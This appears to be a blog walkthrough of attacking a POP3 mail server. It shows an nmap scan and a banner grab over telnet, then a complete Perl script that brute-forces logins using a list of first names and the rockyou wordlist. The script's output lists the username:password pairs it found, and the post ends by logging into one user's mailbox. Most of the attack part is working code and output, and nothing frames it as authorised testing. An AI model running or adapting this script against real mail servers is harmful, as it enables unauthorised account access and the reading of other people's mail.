Scanning the remote host
We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server.
root@asus:~/unix% nmap -p 110 -sC -sV 148.32.42.5 Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-23 14:33 MDT Nmap scan report for mail.acme.com (148.32.42.5) Host is up (0.00018s latency). PORT STATE SERVICE VERSION 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: PIPELINING TOP AUTH-RESP-CODE USER CAPA UIDL SASL(PLAIN) RESP-CODES Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds root@asus:~/unix%
Once we verify that the remote host is running the pop3 service we can move on to connecting to the POP3 service. For this we can use telnet.
root@asus:~/unix% telnet 148.32.42.5 110 Trying 148.32.42.5... Connected to 148.32.42.5. Escape character is '^]'. +OK Dovecot ready. QUIT +OK Logging out Connection closed by foreign host. root@asus:~/unix%
We were able to sucessfully connect to the remote host. We also get the POP3 Banner which is 'Dovecot' telling us the server software version.
Finding valid POP3 logins
Our next step is to use a brute force attack against the POP3 server to find valid user/pass combinations to login to the server with. for this we can write a small perl script which will brute force a list of common first names and the rockyou wordlist for the password side.
#!/usr/bin/env perl
use strict;
use warnings;
use Net::POP3;
my $pop3 = Net::POP3->new('mail.acme.com');
my @userlist = file2array('common-names.txt');
my @passlist = file2array('rockyou.txt');
print "[*] Searching for valid POP3 logins...\n";
foreach my $user (@userlist) {
foreach my $pass (@passlist) {
if ($pop3->login($user,$pass)) {
print "[+] Found Login: $user:$pass\n";
}
}
sleep 1;
}
$pop3->quit;
sub file2array {
my $file = shift;
my @array;
open(my $fh, '<', $file) or die $!;
while (<$fh>) {
chomp($_);
push(@array, $_);
}
close($fh) or die $!;
return @array;
}
If we run the script...
root@asus:~/unix% perl pop3.pl [*] Searching for valid POP3 logins... [+] Found Login: clare:jessica [+] Found Login: vance:654321 [+] Found Login: sasha:michael [+] Found Login: hayden:qwerty root@asus:~/unix%
Logging in to the POP3 server
Now that we have some valid POP3 logins, we can move on to connecting to the server and logging in with our user/pass combos and browse the inbox of the user.
root@asus:~% telnet 148.32.42.5 110 Trying 148.32.42.5... Connected to 148.32.42.5. Escape character is '^]'. +OK Dovecot ready. USER clare +OK PASS jessica +OK Logged in. LIST +OK 0 messages: . QUIT +OK Logging out. Connection closed by foreign host. root@asus:~%
No comments:
Post a Comment